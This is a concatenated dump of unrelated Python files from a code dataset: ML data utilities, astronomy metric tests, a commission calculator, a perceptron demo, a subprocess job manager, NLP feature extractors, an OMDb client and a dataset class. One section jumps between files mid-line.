makeFullPath(filename, '-Xtrain1'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain1)\n filepath_Xtrain = makeFullPath(filename, '-Xtrain2'+str(mean_centered))\n saveSparse(filepath_Xtrain, Xtrain2)\n \n filepath_ytrain = makeFullPath(filename, '-ytrain0'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain0)\n filepath_ytrain = makeFullPath(filename, '-ytrain1'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain1)\n filepath_ytrain = makeFullPath(filename, '-ytrain2'+str(mean_centered))\n np.savetxt(filepath_ytrain, ytrain2)\n \n filepath_Xtest = makeFullPath(filename, '-Xtest0'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest0)\n filepath_Xtest = makeFullPath(filename, '-Xtest1'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest1)\n filepath_Xtest = makeFullPath(filename, '-Xtest2'+str(mean_centered)+predict)\n saveSparse(filepath_Xtest, Xtest2)\n \n filepath_ytest = makeFullPath(filename, '-ytest0'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest0)\n filepath_ytest = makeFullPath(filename, '-ytest1'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest1)\n filepath_ytest = makeFullPath(filename, '-ytest2'+str(mean_centered)+predict)\n np.savetxt(filepath_ytest, ytest2)\n \n \ndef readExampleDataClusters(filename, mean_centered, predict):\n filepath_Xtrain0 = makeFullPath(filename, '-Xtrain0'+str(mean_centered))\n Xtrain0 = loadSparse(filepath_Xtrain0)\n filepath_Xtrain1 = makeFullPath(filename, '-Xtrain1'+str(mean_centered))\n Xtrain1 = loadSparse(filepath_Xtrain1)\n filepath_Xtrain2 = makeFullPath(filename, '-Xtrain2'+str(mean_centered))\n Xtrain2 = loadSparse(filepath_Xtrain2)\n print(\"Xtrain loaded.\",time.ctime())\n \n filepath_Xtest0 = makeFullPath(filename, '-Xtest0'+str(mean_centered))\n Xtest0 = loadSparse(filepath_Xtest0)\n filepath_Xtest1 = makeFullPath(filename, '-Xtest1'+str(mean_centered))\n Xtest1 = loadSparse(filepath_Xtest1)\n filepath_Xtest2 = makeFullPath(filename, '-Xtest2'+str(mean_centered))\n Xtest2 = loadSparse(filepath_Xtest2)\n print(\"Xtest loaded.\",time.ctime())\n \n filepath_ytrain0 = makeFullPath(filename, '-ytrain0'+str(mean_centered)+predict)\n ytrain0 = np.loadtxt(filepath_ytrain0)\n filepath_ytrain1 = makeFullPath(filename, '-ytrain1'+str(mean_centered)+predict)\n ytrain1 = np.loadtxt(filepath_ytrain1)\n filepath_ytrain2 = makeFullPath(filename, '-ytrain2'+str(mean_centered)+predict)\n ytrain2 = np.loadtxt(filepath_ytrain2)\n print(\"ytrain loaded.\",time.ctime())\n \n filepath_ytest0 = makeFullPath(filename, '-ytest0'+str(mean_centered)+predict)\n ytest0 = np.loadtxt(filepath_ytest0)\n filepath_ytest1 = makeFullPath(filename, '-ytest1'+str(mean_centered)+predict)\n ytest1 = np.loadtxt(filepath_ytest1)\n filepath_ytest2 = makeFullPath(filename, '-ytest2'+str(mean_centered)+predict)\n ytest2 = np.loadtxt(filepath_ytest2)\n print(\"ytest loaded.\",time.ctime())\n return Xtrain0, Xtrain1, Xtrain2, ytrain0, ytrain1, ytrain2, Xtest0, Xtest1, Xtest2, ytest0, ytest1, ytest2\n \n \n \n \n ","repo_name":"djp42/IntentionPrediction","sub_path":"deprecated/learn_util.py","file_name":"learn_util.py","file_ext":"py","file_size_in_byte":18112,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"781037007","text":"import matplotlib\n\nmatplotlib.use(\"Agg\")\nimport unittest\n\nimport numpy as np\n\nimport rubin_sim.maf.metrics as metrics\nimport rubin_sim.maf.stackers as stackers\n\n\nclass TestCalibrationMetrics(unittest.TestCase):\n def test_parallax_metric(self):\n \"\"\"\n Test the parallax metric.\n \"\"\"\n names = [\n \"observationStartMJD\",\n \"finSeeing\",\n \"fiveSigmaDepth\",\n \"fieldRA\",\n \"fieldDec\",\n \"filter\",\n ]\n types = [float, float, float, float, float, (np.str_, 1)]\n data = np.zeros(700, dtype=list(zip(names, types)))\n slice_point = {\"sid\": 0}\n data[\"observationStartMJD\"] = np.arange(700) + 56762\n data[\"finSeeing\"] = 0.7\n data[\"filter\"][0:100] = str(\"r\")\n data[\"filter\"][100:200] = str(\"u\")\n data[\"filter\"][200:] = str(\"g\")\n data[\"fiveSigmaDepth\"] = 24.0\n stacker = stackers.ParallaxFactorStacker()\n data = stacker.run(data)\n norm_flags = [False, True]\n for flag in norm_flags:\n data[\"finSeeing\"] = 0.7\n data[\"fiveSigmaDepth\"] = 24.0\n baseline = metrics.ParallaxMetric(normalize=flag, seeing_col=\"finSeeing\").run(data, slice_point)\n data[\"finSeeing\"] = data[\"finSeeing\"] + 0.3\n worse1 = metrics.ParallaxMetric(normalize=flag, seeing_col=\"finSeeing\").run(data, slice_point)\n worse2 = metrics.ParallaxMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data, slice_point\n )\n worse3 = metrics.ParallaxMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n data[\"fiveSigmaDepth\"] = data[\"fiveSigmaDepth\"] - 1.0\n worse4 = metrics.ParallaxMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n # Make sure the RMS increases as seeing increases, the star gets fainter,\n # the background gets brighter, or the baseline decreases.\n if flag:\n pass\n else:\n assert worse1 > baseline\n assert worse2 > worse1\n assert worse3 > worse2\n assert worse4 > worse3\n\n def test_proper_motion_metric(self):\n \"\"\"\n Test the ProperMotion metric.\n \"\"\"\n names = [\n \"observationStartMJD\",\n \"finSeeing\",\n \"fiveSigmaDepth\",\n \"fieldRA\",\n \"fieldDec\",\n \"filter\",\n ]\n types = [float, float, float, float, float, (np.str_, 1)]\n data = np.zeros(700, dtype=list(zip(names, types)))\n slice_point = [0]\n stacker = stackers.ParallaxFactorStacker()\n norm_flags = [False, True]\n data[\"observationStartMJD\"] = np.arange(700) + 56762\n data[\"finSeeing\"] = 0.7\n data[\"filter\"][0:100] = str(\"r\")\n data[\"filter\"][100:200] = str(\"u\")\n data[\"filter\"][200:] = str(\"g\")\n data[\"fiveSigmaDepth\"] = 24.0\n data = stacker.run(data)\n for flag in norm_flags:\n data[\"finSeeing\"] = 0.7\n data[\"fiveSigmaDepth\"] = 24\n baseline = metrics.ProperMotionMetric(normalize=flag, seeing_col=\"finSeeing\").run(\n data, slice_point\n )\n data[\"finSeeing\"] = data[\"finSeeing\"] + 0.3\n worse1 = metrics.ProperMotionMetric(normalize=flag, seeing_col=\"finSeeing\").run(data, slice_point)\n worse2 = metrics.ProperMotionMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data, slice_point\n )\n worse3 = metrics.ProperMotionMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n data[\"fiveSigmaDepth\"] = data[\"fiveSigmaDepth\"] - 1.0\n worse4 = metrics.ProperMotionMetric(normalize=flag, rmag=22.0, seeing_col=\"finSeeing\").run(\n data[0:300], slice_point\n )\n # Make sure the RMS increases as seeing increases, the star gets fainter,\n # the background gets brighter, or the baseline decreases.\n if flag:\n # When normalized, mag of star and m5 don't matter (just scheduling).\n self.assertAlmostEqual(worse2, worse1)\n self.assertAlmostEqual(worse4, worse3)\n # But using fewer points should make proper motion worse.\n # survey assumed to have same seeing and limiting mags.\n assert worse3 < worse2\n else:\n assert worse1 > baseline\n assert worse2 > worse1\n assert worse3 > worse2\n assert worse4 > worse3\n\n def test_parallax_coverage_metric(self):\n \"\"\"\n Test the parallax coverage\n \"\"\"\n names = [\n \"observationStartMJD\",\n \"finSeeing\",\n \"fiveSigmaDepth\",\n \"fieldRA\",\n \"fieldDec\",\n \"filter\",\n \"ra_pi_amp\",\n \"dec_pi_amp\",\n ]\n types = [float, float, float, float, float, \" maximum:\n commission = maximum\n return commission\n\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n\n def commissions_europe(self): # it was originally just Germany\n # # Austria, Belgio, Danimarca, Finlandia, Francia, Germany, Irlanda, Norvegia, Paesi Bassi, Portogallo,\n # # Regno Unito, Spagna, Svezia, Svizzera\n try:\n # This is the commission which is fixed, always the same\n fixed_commission = 5\n # size is supposed to be the number of shares we are buying for the company.\n commission_percentage = 0.00025 # 0.25 per mille€\n amount_spent = self.size * self.buying_price\n minimum = 9.5 # euro\n commission = commission_percentage * amount_spent\n if commission < minimum:\n commission = minimum\n return commission\n\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n\n def commissions_switzerland(self):\n try:\n # This is the commission which is fixed, always the same\n fixed_commission = 5\n # size is supposed to be the number of shares we are buying for the company.\n commission_percentage = 0.0003 # 0.3 per thousand\n amount_spent = self.size * self.buying_price\n minimum = 20 * 0.94 # 20 CHF * exchange rate euro = currency in euro\n commission = commission_percentage * amount_spent\n if commission < minimum:\n commission = minimum\n return commission\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n\n def commissions_others(self):\n try:\n # To define:::\n # This is the commission which is fixed, always the same\n fixed_commission = 20\n # size is supposed to be the number of shares we are buying for the company.\n commission_per_price = 0.0016 # dollars\n # The following is the commission price\n commission = fixed_commission + self.size * self.buying_price * commission_per_price\n return commission\n except Exception as e:\n log.error(f\"There is a problem in the code!: {e}\\n{getDebugInfo()}\")\n","repo_name":"marcello-goccia/deep-value-investing","sub_path":"backtesting/homemade_testing/commissions/directa.py","file_name":"directa.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"18861172603","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 26 23:38:31 2021\n\n@author: marunga\n\"\"\"\n\nimport numpy as np\n\n\"\"\"\n# OPERADOR AND\n#Entradas\nx = np.array([[0,0],[0,1],[1,0],[1,1]])\n#Saídas\ny = np.array([0,0,0,1])\n\"\"\"\n\n\n# OPERADOR OR\n#Entradas\nx = np.array([[0,0],[0,1],[1,0],[1,1]])\n#Saídas\ny = np.array([0,1,1,1])\n\n#Pesos\nw = np.array([0.0,0.0])\n#Taxa de aprendizagem\nlearning = 0.1\n\n#Função de ativação\ndef functionActivation (summation):\n if (summation >=1):\n return 1\n return 0\n\n#Função Somatório\ndef calculateOutput(register):\n #Realiza o produto escalar do par ordedado de entradas com o peso\n result = register.dot(w)\n return functionActivation(result)\n\n#Treinamento, encontra o melhor conjunto de pesos\ndef training ():\n erroTotal = 1\n while (erroTotal != 0):\n erroTotal = 0\n for i in range(len(y)):\n #Calcula a saída \n calculatedOutput = calculateOutput(np.array(x[i]))\n #Calcula a diferença entre a saida esperada e saida calculada\n erro = abs(y[i]- calculatedOutput)\n erroTotal += erro\n #Atualizando Pesos\n for j in range(len(w)):\n #Proximo peso = Peso atual + Taxa de Aprendizado * Entrada Atual * Erro\n w[j] = w[j]+ (learning*x[i][j]*erro)\n print('Peso atualizado: ' + str(w[j]))\n print('Total de Erros: ' +str(erroTotal))\n \ntraining()\nprint('Rede Treinada!')\n#Com a rede treinada, testa se as respostas sairão sem erros\nprint(calculateOutput((x[0])))\nprint(calculateOutput((x[1])))\nprint(calculateOutput((x[2])))\nprint(calculateOutput((x[3])))","repo_name":"livio-lopes/pythonProjects","sub_path":"rna/rna_uma_camada/perceptron_treinamento.py","file_name":"perceptron_treinamento.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28039059794","text":"import subprocess\nimport threading\nimport time\nfrom datetime import datetime\nimport enum\nimport os\nimport uuid\nfrom collections import Counter\nimport json\nimport contextlib\n\nclass JobRunningStatus(enum.IntEnum):\n Ready = 0\n Running = 1\n Completed = 2\n RetryOut = 3\n\nclass CalledJobError(Exception):\n pass\n\nclass SimpleJobManager:\n def __init__(self, logOutputDirectory:str=\"\") -> None:\n self.lock:threading.Lock = threading.Lock()\n self.allJobRunningStatus:dict = {}\n self.jobs:list = []\n self.logOutputDirecotry:str = logOutputDirectory\n self.jobContexts = None\n\n def detectDuplicatedIds(self, jobContexts:list) -> list:\n return [ key for ( key, value ) in Counter([ context[\"id\"] for context in jobContexts ]).items() if value > 1 ]\n\n def detectCircularReferencedIds(self, jobContexts:list) -> list:\n def traceGraph(id, graph, visited=set()) -> bool:\n visited.add(id)\n\n for neighbor in graph.get(id, []):\n if neighbor in visited or traceGraph(neighbor, graph, visited):\n return True\n\n visited.remove(id)\n return False\n\n graph = { context[\"id\"]: context.get(\"waits\", []) for context in jobContexts }\n return [ id for id in graph.keys() if traceGraph(id, graph) ]\n \n def detectInvalidWaitsIds(self, jobContexts:list) -> list:\n ids = { context[\"id\"] for context in jobContexts }\n waitsIds = { id for context in jobContexts for id in context.get(\"waits\", []) }\n return waitsIds - ids\n \n def detectInvalidIds(self, jobContexts:list) -> list:\n return [ index for index, context in enumerate(jobContexts) if not context.get(\"id\", None) ]\n\n def entryFromJson(self, filename:str):\n with open(filename, \"r\") as f:\n jobContexts = json.load(f)[\"jobContexts\"]\n\n if len([ context for context in jobContexts if context.get(\"semaphore\", None) is not None ]) > 0:\n raise ValueError(\"Key 'semaphore' can not be specified for JSON data read from a file.\")\n\n self.entry(jobContexts)\n\n def entry(self, jobContexts:list) -> None:\n elementIndices = self.detectInvalidIds(jobContexts)\n if len(elementIndices) > 0:\n raise ValueError(f\"Invalid Id detected. element indices={elementIndices}\")\n\n invalidWaitsIds = self.detectInvalidWaitsIds(jobContexts)\n if len(invalidWaitsIds) > 0:\n raise ValueError(f\"Invalid waits. ids.={invalidWaitsIds}\")\n\n dupKeys = self.detectDuplicatedIds(jobContexts)\n if len(dupKeys) > 0:\n raise ValueError(f\"Id duplicated. ids={dupKeys}\")\n\n circularIds = self.detectCircularReferencedIds(jobContexts)\n if len(circularIds) > 0:\n raise ValueError(f\"Circular referenced. ids={circularIds}\")\n\n self.join()\n\n self.lock.acquire()\n self.allJobRunningStatus.clear()\n self.lock.release()\n\n self.jobs.clear()\n for context in jobContexts:\n job = SimpleJob()\n context[\"jobManager\"] = self\n context[\"logOutputDirectory\"] = self.logOutputDirecotry\n job.entry(**context)\n self.jobs.append(job)\n\n self.jobContexts = jobContexts\n\n def rerun(self, interval:float=1.0):\n self.join(interval)\n\n for index, job in enumerate(self.jobs):\n if not job.hasError() and not job.retryOuted():\n continue\n\n job = SimpleJob()\n context = self.jobContexts[index]\n context[\"jobManager\"] = self\n context[\"logOutputDirectory\"] = self.logOutputDirecotry\n job.entry(**context)\n self.jobs[index] = job\n\n self.run(interval)\n\n def runAllReadyJobs(self) -> None:\n [ job.start() for job in self.jobs if job.ready() and not job.ident]\n\n def running(self) -> bool:\n return len([ job for job in self.jobs if job.running() ]) >= 1\n\n def join(self, interval:float=1.0) -> None:\n while self.running():\n time.sleep(interval)\n\n def run(self, interval:float=1.0) -> None:\n while True:\n self.runAllReadyJobs()\n if self.errorOccurred():\n self.join(interval)\n break\n\n if self.completed():\n break\n\n time.sleep(interval)\n\n if self.errorOccurred():\n raise CalledJobError(\"Error occured\")\n\n def completed(self) -> bool:\n return len([ job for job in self.jobs if job.completed() ]) == len(self.jobs)\n\n def errorOccurred(self) -> bool:\n return len([ job for job in self.jobs if job.completed() and job.hasError() ]) >= 1\n\n def report(self) -> dict:\n report = { \"results\": [] }\n for job in self.jobs:\n report[\"results\"].append({ job.id: job.report() })\n\n return json.dumps(report, indent=4)\n\n def getRunningStatus(self):\n return Counter([ job.runningStatus.name for job in self.jobs ])\n\nclass SimpleJob(threading.Thread):\n def entry(self, commandLine:str, id:str=\"\", timeout:int=None, retry:int=1, delay:int=0, backoff:int=1, waits:list=[], semaphore=None, logOutputDirectory:str=\"\", jobManager:SimpleJobManager=None) -> None:\n if not jobManager and len(waits) > 0:\n raise ValueError(\"waits list can set the JobManager together.\")\n\n self.commandLine:str = commandLine\n self.id:str = id if id != \"\" else uuid.uuid4()\n self.waits:list = waits\n self.semaphore = semaphore\n self.logOutputDirectory:str = logOutputDirectory\n self.logFileName:str = \"\" if not self.logOutputDirectory else os.path.join(self.logOutputDirectory, f\"{self.id}.log\")\n self.jobManager:SimpleJobManager = jobManager\n self.exitCode:int = 0\n self.runningStatus:JobRunningStatus = JobRunningStatus.Ready\n self.startDateTime:datetime = None\n self.finishDateTime:datetime = None\n self.startTime:float = 0\n self.finishTime:float = 0\n\n # retry parameters\n self.retry:int = retry\n self.timeout:int = timeout\n self.delay:int = delay\n self.backoff:int = backoff\n self.retried:int = 0\n\n @property\n def runningStatus(self) -> JobRunningStatus:\n return self._runningStatus\n\n @runningStatus.setter\n def runningStatus(self, value:JobRunningStatus) -> None:\n self._runningStatus = value\n\n if self.jobManager:\n self.jobManager.lock.acquire()\n self.jobManager.allJobRunningStatus[self.id] = value\n self.jobManager.lock.release()\n\n def hasError(self) -> bool:\n return self.exitCode != 0\n\n def retryOuted(self) -> bool:\n return self.runningStatus == JobRunningStatus.RetryOut\n\n def ready(self) -> bool:\n if self.runningStatus != JobRunningStatus.Ready:\n return False\n\n if not self.waits:\n return True\n \n if self.jobManager:\n self.jobManager.lock.acquire()\n completed = [ job for job in self.jobManager.jobs if job.id in self.waits and job.completed() and not job.hasError() ]\n self.jobManager.lock.release()\n\n return len(completed) == len(self.waits)\n\n def running(self) -> JobRunningStatus:\n return self._runningStatus == JobRunningStatus.Running\n\n def completed(self) -> bool:\n return self._runningStatus in [ JobRunningStatus.Completed, JobRunningStatus.RetryOut ]\n\n def run(self) -> None:\n self.runningStatus = JobRunningStatus.Running\n self.startTime = time.perf_counter()\n self.startDateTime = datetime.now()\n\n for trialCounter in range(0, self.retry + 1):\n try:\n with self.semaphore if self.semaphore is not None else contextlib.nullcontext():\n completePocess = subprocess.run(self.commandLine, capture_output=True, text=True, timeout=self.timeout)\n self.writeLog(completePocess.stdout)\n except subprocess.TimeoutExpired as e:\n self.writeLog(e.output)\n self.writeLog(f\"Error: Timed out({trialCounter}/{self.retry})\")\n\n self.retried = trialCounter\n time.sleep((trialCounter + 1) ** self.backoff + self.delay) # Exponential backoff\n else:\n self.exitCode = completePocess.returncode # latest return code\n self.runningStatus = JobRunningStatus.Completed\n self.finishDateTime = datetime.now()\n self.finishTime = time.perf_counter()\n return\n\n self.exitCode = None\n self.runningStatus = JobRunningStatus.RetryOut\n self.finishDateTime = datetime.now()\n self.finishTime = time.perf_counter()\n\n def writeLog(self, text) -> None:\n if not self.logOutputDirectory:\n return\n\n with open(self.logFileName, \"a\", encoding=\"utf-8\") as f:\n f.writelines(text)\n\n def report(self) -> dict:\n return {\n \"runnigStatus\": self.runningStatus.name,\n \"exitCode\": self.exitCode if self.completed() else None,\n \"retried\": self.retried if self.timeout is not None else None,\n \"commandLine\": self.commandLine,\n \"startDateTime\": self.startDateTime.strftime('%Y/%m/%d %H:%M:%S.%f') if self.startDateTime is not None else None,\n \"finishDateTime\": self.finishDateTime.strftime('%Y/%m/%d %H:%M:%S.%f') if self.finishDateTime is not None else None,\n \"elapsedTime\": self.getElapsedTime()\n }\n\n def getElapsedTime(self) -> str:\n totalMilleSeconds = self.finishTime - self.startTime\n if totalMilleSeconds == 0:\n return None\n\n hours = int(totalMilleSeconds / 3600)\n totalMilleSeconds -= hours * 3600\n minutes = int(totalMilleSeconds / 60)\n totalMilleSeconds -= minutes * 60\n seconds = int(totalMilleSeconds)\n totalMilleSeconds -= seconds\n totalMilleSeconds *= 1000000\n\n return f\"{hours:02}:{minutes:02}:{seconds:02}.{int(totalMilleSeconds)}\"\n","repo_name":"Hajime-Saitou/simplejob","sub_path":"simplejob/simplejob.py","file_name":"simplejob.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18101535527","text":"import pkg_resources\nfrom negspacy.negation import Negex # noqa: F401\n\nfrom raiutils.dataset import fetch_dataset\n\nPOSITIVE_NEGATIVE_FILE = 'positive-negative.csv'\n\nresource_package = __name__\nnlp_url = 'https://publictestdatasets.blob.core.windows.net/nlp/'\nfetch_dataset(nlp_url + POSITIVE_NEGATIVE_FILE, POSITIVE_NEGATIVE_FILE)\nmale_words_path = '/'.join(('data', 'male-words.txt'))\nfemale_words_path = '/'.join(('data', 'female-words.txt'))\nneutral_words_path = '/'.join(('data', 'neutral-words.txt'))\nmale_words_data = pkg_resources.resource_string(\n resource_package, male_words_path).decode(\"utf-8\")\nfemale_words_data = pkg_resources.resource_string(\n resource_package, female_words_path).decode(\"utf-8\")\nneutral_words_data = pkg_resources.resource_string(\n resource_package, neutral_words_path).decode(\"utf-8\")\n\nwith open(POSITIVE_NEGATIVE_FILE, 'r', encoding='utf8') as pnf:\n positive_negative_raw = pnf.read()\n\npositive_negative_lines = positive_negative_raw.split(\"\\n\")\n\npositive_words = set()\nnegative_words = set()\nfor line in positive_negative_lines[2:]:\n words = list(map(lambda w: w.strip(), line.split(\",\")))\n if len(words[1]) > 0:\n negative_words.add(words[1])\n\n if len(words[2]) > 0:\n positive_words.add(words[2])\n\nmale_words_raw = male_words_data\nmale_words = set(\n filter(\n lambda w: len(w) > 0,\n map(lambda w: w.strip(), male_words_raw.split(\"\\n\"))))\n\nfemale_words_raw = female_words_data\nfemale_words = set(\n filter(\n lambda w: len(w) > 0,\n map(lambda w: w.strip(), female_words_raw.split(\"\\n\"))))\n\nneutral_words_raw = neutral_words_data\nneutral_words = set(filter(\n lambda w: len(w) > 0,\n map(lambda w: w.strip(), neutral_words_raw.split(\"\\n\"))))\n\n\ndef positive_negative_word_count(nlp_doc):\n positive_count = 0\n negative_count = 0\n for token in nlp_doc:\n if token.lemma_ in positive_words or token.text in positive_words:\n positive_count += 1\n elif token.lemma_ in negative_words or token.text in negative_words:\n negative_count += 1\n\n return {\n \"positive_word_count\": positive_count,\n \"negative_word_count\": negative_count}\n\n\ndef get_named_persons(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(lambda tok: tok.label_ == \"PERSON\", nlp_doc.ents)))\n\n\ndef get_named_locations(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(lambda tok: tok.label_ in [\"LOC\", \"FAC\"], nlp_doc.ents)))\n\n\ndef get_dates(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(lambda tok: tok.label_ == \"DATE\", nlp_doc.ents)))\n\n\ndef get_non_date_numerics(nlp_doc):\n return list(map(\n lambda tok: tok.text,\n filter(\n lambda tok: tok.label_ in [\n \"TIME\", \"PERCENT\", \"MONEY\",\n \"QUANTITY\", \"ORDINAL\", \"CARDINAL\"],\n nlp_doc.ents)))\n\n\ndef get_all_named_entities(nlp_doc):\n return list(map(lambda tok: tok.text, nlp_doc.ents))\n\n\ndef is_noun_phrase(nlp_doc):\n return (len(list(nlp_doc.noun_chunks)) == 1)\n\n\ndef get_dependency_tree_tokens(root_token):\n dependency_tree_tokens = list()\n token_queue = [root_token]\n while len(token_queue) > 0:\n token = token_queue[0]\n dependency_tree_tokens.append(token.text)\n token_queue = token_queue[1:]\n for child in token.children:\n token_queue.append(child)\n\n return dependency_tree_tokens\n\n\ndef is_adjective_phrase(nlp_doc):\n adjectives = list(filter(lambda tok: tok.pos_ == \"ADJ\", nlp_doc))\n for adjective in adjectives:\n dep_tree_tokens = get_dependency_tree_tokens(adjective)\n if len(dep_tree_tokens) == len(nlp_doc):\n return True\n\n return False\n\n\ndef is_verb_phrase(nlp_doc):\n adjectives = list(filter(lambda tok: tok.pos_ == \"VERB\", nlp_doc))\n for adjective in adjectives:\n dep_tree_tokens = get_dependency_tree_tokens(adjective)\n if len(dep_tree_tokens) == len(nlp_doc):\n return True\n\n return False\n\n\ndef get_sub_sentences(sentence):\n sub_sentences = sentence.split(\";\")\n\n return sub_sentences\n\n\ndef detect_sub_sentences_with_different_sentiments(classify_helper, sentence):\n sub_sentences = get_sub_sentences(sentence)\n sentiments = set(classify_helper(sub_sentences))\n\n if len(sentiments) == 1:\n return False\n\n return True\n\n\ndef detect_negation_words_and_entities(nlp_doc):\n negation_tokens = list(filter(lambda tok: tok.dep_ == \"neg\", nlp_doc))\n negated_entities = list(filter(lambda tok: tok._.negex, nlp_doc.ents))\n return {\n \"negation_words\": len(negation_tokens),\n \"negated_entities\": len(negated_entities)}\n\n\ndef dependency_parse_tree_depth(doc):\n # Assumes that we hae one sentence\n sent = next(doc.sents)\n root = sent.root\n depth = 0\n queue = [(root, 0)]\n while len(queue) > 0:\n node, d = queue[0]\n depth = d\n queue = queue[1:]\n for child in node.children:\n queue.append((child, d + 1))\n\n return depth\n","repo_name":"microsoft/responsible-ai-toolbox","sub_path":"nlp_feature_extractors/nlp_feature_extractors/attribute_extractors.py","file_name":"attribute_extractors.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"37"} +{"seq_id":"86573659475","text":"import requests\nimport json\nfrom pprint import pprint\nfrom movie import Movie\nfrom datetime import datetime\nimport locale\nimport os\n\n# locale.setlocale(locale.LC_ALL, 'en_US')\n\nclass Omdb:\n\n def __init__(self, api_key):\n self.api_key = api_key\n\n def omdb_get_by_id(self, id, api_key):\n r = requests.get(f'http://www.omdbapi.com/?i={id}&apikey={api_key}')\n r = r.json()\n if r['Response'] == \"False\":\n movie = f\"Aucun film avec l'id {id} n'existe pas dans la base\"\n return movie\n else:\n imdb_id_str = r['imdbID']\n imdb_id = imdb_id_str.replace(\"tt\", \"\")\n title = r['Title']\n original_title = r['Title']\n\n release_date_class = r['Released']\n if release_date_class == 'N/A':\n release_date_class = None\n release_date = None\n else:\n release_date_strip = release_date_class.strip()\n release_date_object = datetime.strptime(release_date_strip, '%d %b %Y')\n release_date = release_date_object.strftime('%Y-%m-%d')\n\n duration = r['Runtime']\n if duration == 'N/A':\n duration = None\n else:\n duration = duration.split()\n duration = duration[0]\n\n if r['Rated'] == 'R':\n rating = '-12'\n elif r['Rated'] == 'NC-17':\n rating = '-16'\n else:\n rating = 'TP'\n if r['Type']==\"movie\":\n box_office = r['BoxOffice']\n if r['BoxOffice'] == 'N/A':\n box_office = None\n else:\n box_office = None\n imdb_score = r['imdbRating']\n\n movie = Movie(title, original_title, release_date, duration, rating)\n movie.imdb_id = imdb_id\n movie.imdb_score = imdb_score\n movie.box_office = box_office\n\n return movie\n\n def omdb_get_actors(self, id, api_key):\n r = requests.get(f'http://www.omdbapi.com/?i={id}&apikey={api_key}')\n r = r.json()\n\n actors = r['Actors']\n return actors","repo_name":"Simplon-IA-Bdx-1/the-movie-predictor-thiberged","sub_path":"omdb.py","file_name":"omdb.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70644692267","text":"\nimport numpy as np\nfrom omnilearn.old.data import register_dataset, Batchable, ImageDataset\n\n\n@register_dataset('unpaired-translation')\nclass UnpairedTranslationDataset(ImageDataset):\n\tdef __init__(self, A, dataset1=None, dataset2=None, sel_one=None, swap=None, **kwargs):\n\n\t\tif dataset1 is None:\n\t\t\tdataset1 = A.pull('dataset1')\n\t\tif dataset2 is None:\n\t\t\tdataset2 = A.pull('dataset2')\n\n\t\tif sel_one is None:\n\t\t\tsel_one = A.pull('sel-first', True)\n\n\t\tif swap is None:\n\t\t\tswap = A.pull('swap', False)\n\n\t\tif swap:\n\t\t\tdataset1, dataset2 = dataset2, dataset1\n\n\t\tprint(f'Sizes: {len(dataset1)} vs {len(dataset2)}')\n\n\t\tsuper().__init__(A, din=dataset1.din, dout=dataset2.din, **kwargs)\n\n\t\tself.din1, self.dout1 = dataset1.din, dataset1.dout\n\t\tself.din2, self.dout2 = dataset2.din, dataset2.dout\n\n\t\tself.dataset1 = dataset1\n\t\tself.dataset2 = dataset2\n\n\t\tself.select_first = sel_one\n\n\tdef __len__(self):\n\t\treturn len(self.dataset1) * len(self.dataset2)\n\n\tdef __getitem__(self, item):\n\n\t\tidx1 = item // len(self.dataset2)\n\t\tidx2 = item % len(self.dataset2)\n\n\t\tb1 = self.dataset1[idx1]\n\t\tb2 = self.dataset2[idx2]\n\n\t\tif self.select_first and isinstance(b1, (list, tuple)):\n\t\t\tb1 = b1[0]\n\t\t\tb2 = b2[0]\n\n\t\treturn (b1, b2)\n\n\n@register_dataset('batched-unpaired-translation')\nclass BatchedUnpairedTranslationDataset(Batchable, UnpairedTranslationDataset):\n\n\tdef __getitem__(self, item):\n\n\t\tif isinstance(item, (list, tuple)):\n\t\t\titem = np.array(item)\n\n\t\tidx1 = item // len(self.dataset2)\n\t\tidx2 = item % len(self.dataset2)\n\n\t\tb1 = self.dataset1[idx1]\n\t\tb2 = self.dataset2[idx2]\n\n\t\tif self.select_first and isinstance(b1, (list, tuple)):\n\t\t\tb1 = b1[0]\n\t\t\tb2 = b2[0]\n\n\t\treturn (b1, b2)\n\n\n# @Dataset('unpaired-translation')\n# class UnpairedTranslationDataset(Batchable):\n#\n# \tdef __init__(self, A, dataset1=None, dataset2=None, sel_one=None):\n#\n# \t\tmode = A.pull('mode', 'train')\n#\n# \t\tif dataset1 is None:\n# \t\t\tdataset1 = A.pull('dataset1')\n# \t\t\tif type(dataset1) == dict:\n# \t\t\t\tslice1 = dataset1\n# \t\t\t\tdataset1 = dataset1[mode]\n# \t\t\telse:\n# 